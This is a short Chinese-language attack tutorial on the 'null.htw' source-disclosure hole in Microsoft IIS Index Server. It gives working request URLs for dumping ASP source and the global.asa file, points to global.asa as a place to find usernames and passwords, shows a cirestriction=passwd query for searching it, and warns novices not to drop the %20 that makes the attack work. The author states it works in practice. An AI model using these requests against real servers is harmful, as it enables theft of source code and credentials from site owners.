null.htw 最新利用
/ns/cn/jc/data/20010414002319.htm
查查null.htw都会得到这些内容 http://ip/null.htw?ciwebhitsfile=/login.asp%20&cirestriction=""&cihilitetype=full
/login.asp 从/开始算起
eg: www.xxx.com/a/a.asp
那就把/login.asp改成/a/a.asp http://ip/null.htw?ciwebhitsfile=/a.asp%20&cirestriction=""&cihilitetype=full
http://ip/null.htw?ciwebhitsfile=/Global.asa%20&cirestriction=""&cihilitetype=full
由于这个漏洞null.htw最大能力也就是泄露源代码
所以最好运用就是泄露global.asa文件,此文件往往带着名字,密码等重要内容.
讲解一下:null.htw 调用了ciwebhitsfile,cirestriction,cihilitetype
处理.其中
ciwebhitsfile 处理文件
cirestriction 查找信息
cihilitetype 格式
(***个人理解^_^***)
上面我们已经了解了 ciwebhitsfile 处理文件应用
下面我们再说说cirestriction运用^_^
相信很多人都不了解这有什嘛用.其实就是懒人用的(像我就是了)^_^
http://ip/null.htw?ciwebhitsfile=/Global.asa%20&cirestriction=passwd&cihilitetype=full
cirestriction=passwd (从=后面开始)
这样它就会在global.asa查找passwd(有找到会有连接哦^_^)
其实这篇并没有什嘛新技术,但实际操作的确可用.
并稍微讲解了一下ciwebhitsfile cirestriction cihilitetype,便于新手理解.其中请注意了
新手往往省列掉%20,就是说在/*.asp后cirestriction前必须加上%20
http://ip/null.htw?ciwebhitsfile=/Global.asa%20&cirestriction=""&cihilitetype=full
如果没有这%20,那嘛只能返回html的源代码,asp就无法显示了^_^